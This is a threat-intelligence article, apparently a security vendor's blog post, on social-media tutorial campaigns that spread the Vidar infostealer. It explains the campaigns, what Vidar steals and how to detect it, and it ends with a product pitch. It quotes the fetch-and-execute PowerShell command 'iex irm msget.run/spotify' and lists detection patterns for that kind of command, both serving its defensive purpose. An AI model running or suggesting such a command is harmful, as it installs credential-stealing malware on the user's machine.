

Scammers have found a way to distribute infostealer malware without sending a single phishing email. They film a tutorial video, post it to TikTok or Instagram Reels, wait for the algorithm to do the rest, and collect stolen credentials from thousands of infected machines. ReversingLabs researchers recently uncovered two distinct campaigns doing exactly this, both delivering Vidar infostealer through fake software installation guides dressed up to look like legitimate help content. If your organisation runs any kind of BYOD policy, or if your employees access corporate SaaS tools from personal devices, this is a threat you need to understand now.
The mechanics are straightforward, which is precisely what makes them effective. An attacker creates a social media account, produces what looks like a genuinely helpful software tutorial, and instructs viewers to run a PowerShell command to get the software they want. The victim types the command, the malware downloads silently, and the attacker receives a log file containing everything stored in that person's browser within minutes. No malicious attachment, no suspicious link in an email, no warning from a spam filter. Just a video that looked helpful.
The first campaign identified by ReversingLabs centres on fake software installation tutorials. These are not rough-cut screen recordings thrown together overnight. The videos feature polished graphics and voiceovers, production quality high enough to pass a casual inspection as legitimate tech-help content. That level of finish matters enormously on platforms like TikTok and Instagram, where visual credibility and confident delivery are enough to establish perceived authority with a large audience.
The second campaign takes a different approach to audience-building. Rather than relying on a single video, attackers pushed streams of short videos promising free access to paid software , Spotify Premium, Microsoft Word, and similar titles that people genuinely want but would rather not pay for. Each of these short clips serves as a funnel, directing viewers toward a central tutorial video that contains the actual download instructions. It is a content marketing strategy applied to malware distribution, and it works because the promise of free premium software has obvious and enduring appeal.
What both campaigns exploit is trust in format. People have learned to be wary of email attachments and suspicious links, but a slickly produced video on a mainstream social platform triggers very different cognitive responses. The medium itself conveys legitimacy. When someone in your finance team searches for how to activate a piece of software and finds a confident, well-produced tutorial with tens of thousands of views and thousands of likes, their guard is substantially lower than it would be in their inbox.
The technical delivery mechanism is elegant in its simplicity. As reported by Help Net Security, the tutorial instructs the viewer to open PowerShell and enter the command iex irm followed by a domain such as msget.run/spotify. That two-word prefix , iex irm , is doing the heavy lifting. irm is an alias for PowerShell's Invoke-RestMethod cmdlet, which fetches content from a remote URL. iex is Invoke-Expression, which executes whatever that fetched content contains. Chained together, they form a classic one-liner that downloads a remote script and runs it immediately, with no intermediary file written to disk at that stage.
What actually gets downloaded is a file named build.exe, which carries the Vidar infostealer payload. The victim sees a brief command prompt flash and, if the fake software tutorial has been designed carefully enough, may even see a convincing fake installation screen before anything feels wrong. By that point, Vidar has already begun its collection routine. The whole chain , from running the command to initial data exfiltration , can complete in under a minute on a standard machine.
The reason this technique is so dangerous in enterprise contexts is that iex irm one-liners are also used in legitimate administrative scripts. System administrators run similar commands routinely. Blocking PowerShell access entirely is not feasible in most environments, and detecting malicious use requires behavioural monitoring rather than simple keyword filtering. As noted by HackRead, the technique bypasses traditional email security filters entirely because no email is involved at any point in the chain.
The shift toward social media as a malware delivery vector is not accidental. Email security has matured substantially over the past decade. Sandboxing, link rewriting, attachment detonation, and AI-driven phishing detection have made email-based delivery increasingly expensive for attackers. Social media platforms, by contrast, have none of that infrastructure applied to content at scale. A video is a video. The platform's content moderation is built primarily to catch hate speech, misinformation, and copyright violations , not malware delivery instructions embedded in a voiceover.
From an attacker's perspective, social media also offers something email never could: organic reach driven by an algorithm. Post a video that gets early engagement, and the platform will actively distribute it to hundreds of thousands of additional viewers at zero additional cost. That is a distribution capability that would have required a substantial botnet or spam infrastructure to replicate via email. Understanding how these channels now form part of your organisation's external attack surface is increasingly important for security teams who have historically focused their monitoring on traditional threat vectors.
The scale these campaigns can achieve is not theoretical. According to Help Net Security, a single tutorial video in these campaigns accumulated more than 100,000 views and generated thousands of saves, shares, and likes. Think about what that means in terms of infection surface. Even a conservative conversion rate of half a percent , viewers who actually followed the instructions , would represent hundreds of infected machines from a single piece of content. And because shares extend reach beyond the original audience, many of those viewers will have encountered the video not by searching for pirated software but because someone they trusted shared it.
The saves metric is particularly telling. People saving a video to watch later is a signal of genuine intent to follow the instructions, not just passive consumption. A video with thousands of saves is, in effect, a delayed-deployment malware campaign , those saved copies sit in personal feeds waiting to be acted upon, sometimes days or weeks after the initial post. Even if the account is eventually taken down, saved versions persist in viewers' collections.
Perhaps the most alarming detail in the ReversingLabs research is what happened when the threat was reported. Researchers flagged the scam accounts directly to Instagram. The platform rejected those alerts. The accounts remained active. This is not a minor operational hiccup , it reflects a structural problem with how large platforms assess abuse reports that don't fit neatly into their existing violation categories. A video teaching someone to run a PowerShell command does not, on its face, violate community guidelines about violence or harassment. Without malware analysis capabilities embedded in the moderation pipeline, platforms are largely blind to this category of abuse.
For security teams, this has a practical implication: you cannot rely on platform takedowns as a meaningful control. By the time a campaign video is removed , if it is ever removed , it will have already reached its peak organic distribution. Your defensive posture needs to account for the fact that this content will remain available and active, and that your users will encounter it.
Vidar is not new, and it is not subtle. It is a mature, commercially distributed infostealer that has been in active use for several years. What it does, it does very efficiently, and the breadth of data it targets makes even a single infection on a personal device a serious corporate security event.
Once build.exe executes on a victim's machine, Vidar begins systematically extracting data from the browser and the local filesystem. As documented by Infosecurity Magazine, this includes saved passwords, browser cookies, banking data, and cryptocurrency wallet files. In practice, "browser cookies" means active session tokens for every authenticated web application the victim has open or recently accessed , their email, their company's SaaS tools, their banking portals, their cloud storage. A single cookie harvest from a developer's personal laptop could include authenticated sessions for AWS, GitHub, Slack, and a corporate VPN portal simultaneously.
The banking data component adds financial exposure on top of the corporate risk. Victims of these campaigns may find themselves dealing with personal account fraud while their employer's security team is simultaneously trying to contain a credential breach. These incidents compound each other in ways that make incident response significantly more complicated, particularly when the infected device is personal rather than corporate-managed.
Cryptocurrency wallet files are also targeted , a reminder that Vidar's authors built it to extract maximum value from each infection, not to serve a single purpose. The malware collects what it finds and sends it back; the operator then decides which data to use, sell, or trade.
Vidar operates as malware-as-a-service. According to Infosecurity Magazine, a lifetime licence is available on criminal forums for $300. That price point is significant. It means the barrier to entry for running a Vidar campaign is low enough that it's accessible to moderately skilled threat actors with limited resources, not just sophisticated organised crime groups. Anyone willing to spend $300 and invest a few hours producing a convincing tutorial video can operate a campaign of this kind.
The MaaS model also means that the people running these social media campaigns are not necessarily the same people who developed Vidar. They are customers. This creates a fragmented threat picture where attribution is difficult and the pool of potential operators is large. When you monitor dark web markets and Telegram channels for stolen credential logs , which is where Vidar's output typically ends up , you are not tracking a single group but potentially dozens of independent operators all using the same tool.
The honest answer is: any organisation whose employees use personal devices for any work-related activity, or who access corporate systems from machines that are not fully managed. That describes the majority of enterprises in 2025, particularly in sectors like financial services, professional services, and government where hybrid working has become standard practice.
BYOD policies create a direct bridge between consumer-grade threat vectors and corporate infrastructure. An employee who installs Vidar on their personal laptop while trying to get free Spotify access has potentially handed an attacker their VPN credentials, their corporate SaaS session tokens, and their saved passwords for internal systems , all from a device that your endpoint detection tools have no visibility into whatsoever. Your MDM solution covers managed devices. It does nothing for the personal MacBook someone uses to check their work email on Sunday evenings.
The risk is not hypothetical. Infostealer logs harvested from personal devices have been a documented source of initial access for enterprise breaches for several years. The logs get sold on dark web markets, often within hours of infection, and initial access brokers purchase them specifically to identify corporate credentials embedded in the harvest. Your threat intelligence programme needs to account for this channel, not just traditional credential dumps from corporate system breaches.
The population most at risk within an enterprise is broader than you might initially assume. It is not only junior employees who might be tempted by free software. IT staff searching for utility tools, developers looking for shortcuts, finance team members trying to access productivity software , these are all plausible victims of a well-produced tutorial campaign. The social engineering is not targeting naivety; it is targeting the universal human desire to save money on software.
Session cookie theft deserves particular attention because it defeats MFA. When an attacker obtains a valid session cookie for an authenticated application, they do not need the victim's password or their one-time passcode. The session is already authenticated. They simply import the cookie into a browser, and the application treats them as the legitimate logged-in user. This is not a theoretical attack , it is the mechanism behind a growing proportion of business email compromise and SaaS account takeover incidents.
For organisations using SaaS tools for sensitive operations , contract management, financial approvals, HR systems, cloud infrastructure consoles , a single stolen session cookie can give an attacker sufficient access to cause significant damage before the victim or the security team notices anything is wrong. The attacker does not need to establish persistence, install additional tools, or escalate privileges. The stolen session gives them whatever access the legitimate user has, immediately. Understanding indicators of compromise associated with session hijacking , unusual access times, unfamiliar IP geolocation, unexpected actions in audit logs , is one of the few detection opportunities available after a cookie has been stolen from an unmanaged device.
Start with awareness, but do not stop there. Telling employees not to run PowerShell commands they found in a video is good hygiene advice, but it is insufficient as a control. You need to assume that some percentage of your workforce will, at some point, do exactly that on a personal device. Your controls need to account for that reality rather than simply hoping awareness training prevents all incidents.
On managed endpoints, enforce PowerShell execution policies that prevent unsigned scripts from running and log all PowerShell activity to your SIEM. Specifically, commands containing iex combined with irm or Invoke-Expression combined with Invoke-WebRequest or Invoke-RestMethod should generate immediate alerts. These combinations have very limited legitimate use cases in non-administrative contexts and are a reliable indicator of this category of attack.
For BYOD environments, conditional access policies enforced through your identity provider are your primary control. Require re-authentication with fresh credentials at regular intervals and configure your SaaS applications to invalidate sessions that originate from IP addresses or device fingerprints inconsistent with the user's established patterns. This does not prevent cookie theft, but it limits the window in which a stolen cookie remains usable.
Dark web monitoring of infostealer log markets and Telegram channels where logs are traded is one of the highest-value controls available for this threat vector. Vidar logs are posted to these channels rapidly after infection. If you can identify credentials belonging to your organisation in a fresh log dump before an attacker has used them, you have a meaningful window to invalidate sessions, reset passwords, and investigate the source device. Without that monitoring capability, you may not discover the theft until an account takeover has already occurred.
Review your software policy and communicate it clearly. Employees should know where they are permitted to obtain software and what to do if they encounter a request to run command-line instructions as part of an installation process. That is not a normal software installation step, and it should be treated as an immediate red flag. Short, practical guidance distributed through internal channels is more effective than lengthy policy documents that nobody reads.
Finally, consider running tabletop exercises that include the scenario of an unmanaged personal device infection. Walk through what your team would actually do if an employee reported that they had run a suspicious command on their home laptop before accessing corporate systems. The answer to that question, and whether your team has it clearly mapped out, will tell you a great deal about your current preparedness for this threat.
The primary network-based indicator associated with these campaigns is outbound PowerShell connections to domains serving the build.exe payload. The specific domain cited in the research is msget.run, with the path /spotify used in one observed instance. Any DNS query or HTTP request to msget.run from an endpoint in your environment should be treated as a high-priority alert requiring immediate investigation of that machine.
The file build.exe, when identified on a host, is the payload itself. Hash-based detections will vary depending on the specific build delivered to a given victim , Vidar operators frequently repack or recompile payloads to evade static signature detection , so behavioural detection is more reliable than file hashing alone. Look for build.exe executing from a user's temporary directory or downloads folder following a PowerShell parent process. That process chain is a strong behavioural indicator regardless of the specific hash.
Post-infection, Vidar communicates with command-and-control infrastructure to exfiltrate collected data. Because the specific C2 addresses used by individual MaaS operators vary and change frequently, maintaining up-to-date threat intelligence feeds that track Vidar C2 infrastructure is more reliable than relying on static blocklists. Outbound connections from an endpoint to newly registered domains or domains with no prior traffic history from your network, particularly carrying large POST requests in a short window after a new executable runs, warrant immediate scrutiny.
On the host side, look for unexpected access to browser profile directories , specifically the Login Data, Cookies, and Web Data SQLite files within Chrome, Edge, or Firefox profile folders , by processes other than the browser itself. Vidar must read these files to extract credentials and cookies, and access by a non-browser process to these specific files is anomalous behaviour that endpoint detection tools configured for behavioural analysis should flag.
Email security infrastructure has become sophisticated enough to catch the majority of traditional phishing attempts before they reach an inbox. Sandboxing, link analysis, and sender reputation scoring create real friction for email-based campaigns. Social media video platforms have none of that infrastructure applied to content at scale , a video is assessed for community guideline violations, not for whether its instructions would install malware on a viewer's machine. Beyond the defensive gap, social media offers algorithmic distribution that can deliver a malicious tutorial to over 100,000 viewers organically, without any additional infrastructure investment from the attacker. The format also generates trust that email cannot: a polished video with thousands of likes reads as credible in a way that an unsolicited email never does.
irm is PowerShell shorthand for Invoke-RestMethod, a built-in cmdlet that fetches content from a URL. iex is shorthand for Invoke-Expression, which executes a string as PowerShell code. When combined, iex irm https://domain/path fetches whatever content is served at that URL and immediately executes it as code, without saving a script file to disk first. In the campaigns documented by ReversingLabs, this chain results in the download and execution of build.exe containing the Vidar payload. The technique is commonly called a "fileless" initial stage because the intermediary script never persists on disk , though the final executable does write itself to the filesystem.
Not directly. Corporate endpoint detection and response tools, mobile device management platforms, and antivirus solutions only operate on devices enrolled in your management environment. A personal laptop or phone that is not enrolled is entirely outside the visibility of those tools. The practical implication is that if an employee infects a personal device and then accesses corporate systems using credentials or session cookies stored on that device, the theft may go undetected until the stolen credentials appear in dark web markets or an account takeover occurs. This is why dark web monitoring and identity-threat detection on the authentication layer , rather than on the endpoint , are the most reliable compensating controls for BYOD environments.
Vidar does require outbound network connectivity to exfiltrate its collected data. Once the malware completes its harvesting routine , extracting passwords, cookies, banking data, and wallet files , it packages that data and sends it to command-and-control infrastructure operated by the MaaS customer running the campaign. This communication is typically over HTTP or HTTPS to attacker-controlled domains. Historically, some Vidar variants have also used legitimate platforms such as Telegram channels as dead-drop points for C2 configuration data, making the initial C2 lookup harder to distinguish from normal traffic. The exfiltration itself, however, involves a direct connection to attacker infrastructure, which is why outbound traffic monitoring and DNS logging remain relevant detection points even for infections originating on unmanaged devices that temporarily connect to your network.
The source material from ReversingLabs and the secondary reporting does not identify specific geographic or industry targeting in these campaigns. The delivery mechanism , publicly accessible social media content designed to attract anyone searching for free premium software , is inherently broad rather than targeted. Spotify Premium and Microsoft Word are used globally across every industry vertical, which suggests the campaigns are designed for maximum reach rather than precision targeting. That said, the downstream value of stolen credentials varies by victim profile, and infostealer log buyers on underground markets frequently filter purchased logs for specific corporate domains, job titles, or access to particular SaaS platforms. The initial infection may be indiscriminate, but the monetisation of the resulting logs can be highly targeted.
Attacks like this one rarely announce themselves through official channels first. New payloads, active infrastructure, and exploitation techniques circulate in closed forums and private channels well before any public research surfaces them. By the time an incident makes it into a threat report, organisations without early visibility are already behind.
Defendis gives your security team that early visibility. We monitor the dark web, underground forums, and threat actor channels so your team receives relevant intelligence before it becomes breaking news, context about emerging threats matched against your organisation's exposure, without requiring your analysts to spend time in places they should not have to go.